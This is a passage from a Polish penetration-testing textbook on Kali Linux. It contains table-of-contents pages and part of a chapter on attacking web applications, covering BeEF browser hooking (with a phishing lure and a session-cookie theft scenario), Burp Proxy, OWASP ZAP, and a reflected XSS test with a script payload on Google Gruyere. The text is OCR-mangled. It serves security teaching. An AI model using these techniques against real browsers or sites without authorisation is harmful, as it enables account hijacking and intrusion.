Regional Internet Registries czyli regionalni administratorzy adresoacutew IP 57System EDGAR 57Zasoby serwisoacutew spo eczno ciowych 58Zaufanie 59Oferty pracy 59Lokalizacja 60Wyszukiwarka Shodan 60Google hacking 61GHDB czyli Google Hacking Database 63Badanie zasoboacutew sieci komputerowych 65Rekonesans z wykorzystaniem protoko u ICMP 69Rekonesans z wykorzystaniem serweroacutew DNS 71Nmap 76FOCA mdash wyszukiwanie i analiza metadanych 83
Podsumowanie 89
Rozdzia 3 Ataki na serwery aplikacji internetowych 91
Wyszukiwanie podatno ci i luk w zabezpieczeniach 92Webshag 92Skipfish 95ProxyStrike 98Vega 101Owasp-Zap 105Websploit 112
Wykorzystywanie znalezionych luk w zabezpieczeniach (exploity) 113Metasploit 113w3af 120
Wykorzystywanie luk w zabezpieczeniach systemoacutew poczty elektronicznej 123Ataki typu brute-force 125
Hydra 125DirBuster 128WebSlayer 131
amanie hase 137John the Ripper 137
Ataki typu man-in-the-middle 139SSLStrip 140
Podsumowanie 145
Kup książkę Poleć książkę
Spis tre ci
5
Rozdzia 4 Ataki na klienty aplikacji internetowych 147
In ynieria spo eczna 148Pakiet SET mdash Social Engineer Toolkit 149
Zastosowanie pakietu SET do ataku z klonowaniem 151MitM Proxy 161Skanowanie hostoacutew 162
Skanowanie hostoacutew za pomoc pakietu Nessus 162Przechwytywanie i amanie hase u ytkownikoacutew 169
Has a w systemie Windows 171Has a w systemie Linux 173
Narz dzia do amania hase dost pne w systemie Kali Linux 174Johnny 174Programy hashcat i oclHashcat 177samdump2 178chntpw 180Ophcrack 183Crunch 185
Inne narz dzia dost pne w systemie Kali Linux 188Hash-identifier 188dictstat 189RainbowCrack (rcracki_mt) 189findmyhash 190phrasendrescher 190CmosPwd 190creddump 191
Podsumowanie 191
Rozdzia 5 Ataki na metody uwierzytelniania 193
Ataki na zarz dzanie sesjami 195Clickjacking 196
Przechwytywanie ciasteczek sesji 197Narz dzia do przechwytywania sesji 198
Wtyczki przegl darki Firefox 198Cookie Cadger 203Wireshark 206Pakiety Hamster i Ferret 208Atak typu man-in-the-middle 211Narz dzia dsniff i arpspoof 212Ettercap 214Driftnet 217
Wstrzykiwanie kodu SQL 218sqlmap 221
Ataki typu XSS (cross-site scripting) 223Testowanie podatno ci na ataki XSS 224
Techniki XSS cookie stealing i Authentication hijacking 225
Kup książkę Poleć książkę
Spis tre ci
6
Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229
Podsumowanie 229
Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231
BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255
THX-SSL-DOS 257Scapy 259Slowloris 261
LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266
DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270
Podsumowanie 270
Rozdzia 7 Przeciwdzia anie i zapobieganie 271
Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277
Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281
Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284
Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287
Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295
Podsumowanie 300
Kup książkę Poleć książkę
Spis tre ci
7
Rozdzia 8 Tworzenie raportoacutew ko cowych 301
Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307
Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319
Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323
Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327
Podsumowanie 327
Skorowidz 329
Kup książkę Poleć książkę
Spis tre ci
8
Kup książkę Poleć książkę
6
Ataki na aplikacjeinternetowe
i serwery WWW
W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-
ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew
Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
